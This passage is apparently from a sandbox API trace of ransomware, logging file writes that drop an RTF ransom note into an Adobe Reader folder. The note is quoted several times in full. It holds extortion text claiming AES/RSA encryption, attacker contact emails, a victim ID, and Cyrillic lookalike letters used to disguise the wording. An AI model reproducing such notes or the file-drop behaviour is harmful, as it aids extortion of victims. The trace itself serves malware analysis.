n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n…:ºbü…~¯½h\x02×B\x16to@ÀNBåÏ\x07\\\x17ò»\x1c¦\x15¾y³¢H1\x13\x0fSopwu=\x08,}\x1f\n", lpUsedDefaultChar=0x0) returned 7247 [0070.995] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0070.999] CloseHandle (hObject=0x1bc) returned 1 [0070.999] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\bg85_info.rtf")) returned 0xffffffff [0070.999] GetLastError () returned 0x2 [0070.999] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0071.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 